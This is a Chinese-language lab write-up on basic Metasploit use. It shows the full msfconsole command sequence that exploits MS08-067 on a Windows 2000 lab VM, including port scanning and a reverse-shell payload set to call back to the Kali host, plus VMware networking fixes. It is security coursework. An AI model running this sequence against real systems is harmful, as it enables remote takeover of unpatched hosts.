Exp5 MSF基础应用
作者:互联网
Exp5 MSF基础应用
实践内容
- 主动攻击:ms08_067
- exploit/windows/smb/ms08_067_netapi
- generic/shell_reverse_tcp
实践步骤
主动攻击ms08_067
靶机:Win2kServer_SP0_target 10.1.1.119
漏洞:exploit/windows/smb/ms08_067_netapi
payload : generic/shell_reverse_tcp
将Kali和靶机都改为桥接模式,ping通
msfconsole
进入msf控制台搜索相关模块,找到对应的攻击模块exploit/windows/smb/ms08_067_netapi,可知这是一个针对windows-smb的攻击模块
SMB(全称是Server Message Block)是一个协议名,它能被用于Web连接和客户端与服务器之间的信息沟通。SMB最初是IBM的贝瑞·费根鲍姆(Barry Feigenbaum)研制的,其目的是将DOS操作系统中的本地文件接口“中断13”改造为网络文件系统。
info
命令查看exploit/windows/smb/ms08_067_netapi
的相关信息,比如存在该漏洞的目标主机类型、基础设置等
445端口是SMB服务端口
- 选择漏洞,搜索靶机可用端口
use exploit/windows/smb/ms08_067_netapi //选择漏洞
show options // 显示设置
set RHOSTS 10.1.1.119 //设置靶机IP
search portscan //扫描端口,查找可用模块
use auxiliary/scanner/portscan/tcp //使用auxiliary/scanner/portscan/tcp模块
show options
set RHOSTS 10.1.1.119 //设置IP
exploit
445端口已开放
- 查看可用payload,选择一般类的(generic),tcp回连
use exploit/windows/smb/ms08_067_netapi
show payloads
- 配置端口等信息
set payload generic/shell_reverse_tcp
show options
set LHOST 10.1.1.178 //kali的ip
exploit
进行渗透攻击
遇到的问题及解决方案
Kali改为桥接模式以后,无法获取ip地址
检查VMware桥接的网卡选择是否正确,虚拟网络编辑器的VMnet0应“桥接到”与本机网卡地址一致
cat /etc/resolv.conf
检查DNS服务器,nameserver后面的ip地址应该与本机路由器ip一致cat /etc/network/interfaces
检查默认网络信息配置文件,是否与下图一致,不一致则手动输入更改/etc/init.d/networking restart
重启网络配置成功获取ip
https://blog.csdn.net/gw_csdn/article/details/84992696
标签:067,windows,Exp5,exploit,tcp,应用,ms08,MSF,smb 来源: https://www.cnblogs.com/zicerain/p/10742074.html